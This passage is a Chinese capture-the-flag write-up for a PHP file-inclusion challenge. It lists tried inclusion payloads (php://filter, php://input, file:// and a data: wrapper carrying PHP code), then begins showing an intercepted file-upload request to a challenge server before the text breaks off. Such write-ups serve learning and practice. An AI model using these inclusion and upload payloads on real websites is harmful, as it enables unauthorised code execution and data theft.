打开链接,看到链接形式为file=hello.php
,因此首先尝试php文件包含
php://filter/read=convert.base64-encode/resource/hello.php
报错
php://input
报错
file://var/www/hello.php
没有报错,但也没有输出
data: text/plain,<?php echo 123; ?>
报错
经过几次尝试发现上面的结果,走投无路看一看网页源码,发现提示:
访问upload.php
页面
发现是文件上传
随便上传一个文件并抓包,对抓到的包进行修改:
POST http://123.206.31.85:49166/index.php?file=upload.php HTTP/1.1
Host: 123.206.31.85:49166
Connection: keep-alive
Content-Length: 6002
Cache-Control: max-age=0
Origin: http://123.206.31.85:49166
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRQQRAvPdjBb5q6tC
User-A